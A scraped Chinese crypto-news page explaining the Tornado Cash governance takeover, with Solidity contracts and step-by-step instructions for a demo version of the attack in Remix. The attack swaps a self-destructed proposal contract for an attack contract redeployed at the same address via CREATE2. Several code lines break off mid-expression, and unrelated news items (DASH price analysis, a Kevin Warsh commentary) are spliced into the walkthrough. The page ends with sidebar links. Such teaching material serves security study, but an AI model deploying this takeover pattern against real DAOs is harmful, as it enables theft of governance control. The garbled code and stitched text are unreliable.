大概两周前(5 月 20 日),知名混币协议 Tornado Cash 遭受到治理攻击,黑客获取到了Tornado Cash的治理合约的控制权(Owner)。
攻击过程是这样的:攻击者先提交了一个“看起来正常”的提案, 待提案通过之后, 销毁了提案要执行的合约地址, 并在该地址上重新创建了一个攻击合约。
攻击过程可以查看 SharkTeam 的 Tornado
address public owner = msg
function execute(uint256 proposalId) external payable { Proposal storage proposal = proposals[proposalId]; require(proposal
}contract Proposal { event Log(string message); function executeProposal() external { emit Log("Excuted code approved by DAO"); } function emergencyStop() external { selfdestruct(payable(address(0))); }}contract Attack { event Log(string message); address public owner; function executeProposal() external { emit Log("Excuted code not approved by DAO :)"); // For example - set DAO's owner to attacker owner = msg
}contract DeployerDeployer { event Log(address addr); function deploy() external { bytes32 salt = keccak256(abi
}contract Deployer { event Log(address addr); function deployProposal() external { address addr = address(new Proposal()); emit Log(addr); } function deployAttack() external { address addr = address(new Attack()); emit Log(addr); } function kill() external { selfdestruct(payable(address(0))); }}大家可以使用该代码自己在 Remix 中演练一下。
分析 | 资金流入榜首DASH盘面解析:在过去24小时中,DASH在各主流币中非常强势,资金净流入31.97亿人民币。从图中可以看出,DASH目前4小时走势处于上升楔形三角中,底部不断抬高,100均线上穿长期200均线,表明近期压力位将会上移,并且MA100和MA 200将会对币价起到支撑作用,不过目前两均线的缺口在收窄,说明近期上冲动能在逐步减弱,RSI显示进入超买区域,短期有回撤蓄势的需求,上方压力95,下方支撑89,收盘若站稳89上方,还会有上涨空间,反之币价可能回撤至三角底部$75附近寻求支撑。利好消息面,区块链支付服务PolisPay宣布与Dash合作,将支持其万事达卡借记卡。[2019/3/13]
首先部署 DeployerDeployer , 调用 DeployerDeployer.deploy() 部署 Deployer , 然后调用 Deployer.deployProposal() 部署 Proposal 。
拿到 Proposal 提案合约地址后, 向 DAO 发起提案。
分别调用 Deployer.kill 和 Proposal.emergencyStop 销毁掉 Deployer 和 Proposal
再次调用 DeployerDeployer.deploy() 部署 Deployer , 调用 Deployer.deployAttack() 部署 Attack , Attack 将和之前的 Proposal 一致。
前美联储理事Kevin Warsh:从美国经济政策角度解析比特币价格波动: 前美联储理事、斯坦福大学胡佛研究所杰出访问学者Kevin Warsh今日撰文,从政府经济政策角度解读了比特币价格波动的原因。对于2017年BTC价格的狂飙,Warsh认为:1.特朗普上台后推出的减税等宽松政策持续刺激美国经济增长,继而带来的通货膨胀预期促使美国加息进度超预期,比特币成为规避法币贬值的避风港;2.特朗普政府贸易保护政策致使美元在2017年贬值12%,投资者寻求比特币规避贬值;3.据去年10月、11月调查,美国民众对政府的信任度下降14个百分点达到33%,而美元正是建立在公众对政府信任的基础上。而对于今年以来比特币价格的大幅波动,是因为投资者正在调整对政府政策的预期,新任美联储主席也在重新考虑如何更好地实施货币政策,同时也在考虑推出自己的加密货币。[2018/3/8]
执行 DAO.execute 时,攻击完成 获取到了 DAO 的 Owner 权限。
区块律动BlockBeats
曼昆区块链法律
Foresight News
GWEI Research
吴说区块链
西柚yoga
ETH中文
金色早8点
金色财经 子木
ABCDE
0xAyA
作者:0xLoki从整体角度看,以PFP为代表的存量市场会受制于同质化代币市场的规模,但增量市场具备相对的独立性,甚至可能超过同质化代币市场规模,NFT或者NFTfi并不缺乏新叙事.
1900/1/1 0:00:00写在前面2022年年底FTX做出挪用客户资金进行房产购买及高风险投资、姊妹公司Alameda财务造假、关联交易等一系列骚操作后股价暴跌、迅速破产。溯及FTX暴雷的半年前稳定币LUNA崩盘.
1900/1/1 0:00:00区块链游戏的概念虽然很早就被提出,但严格来说,直到 20 年牛市开始前,整个加密行业都很难挑出一款具有代表性的区块链游戏产品.
1900/1/1 0:00:00在日常消费生活中,商业积分已经司空见怪。对于商家来说,这是其经营会员系统的一种手段,但对于大多数消费者来说,商家给予的积分并未得到他们足够的重视.
1900/1/1 0:00:00编译:深链DeepChain比特币和黄金之间的相关性大型金融机构摩根大通的分析师在给客户的备忘录中表示,在最新的价格预测中,加密货币比特币可能达到 630 万日元(45,000 美元).
1900/1/1 0:00:00作者:Loki,Web3 builder,火币孵化器研究员 来源:mirror依据 Binance Listing 公告信息,2022.4.29-2023.6.4 的 13 个月期间.
1900/1/1 0:00:00
木星链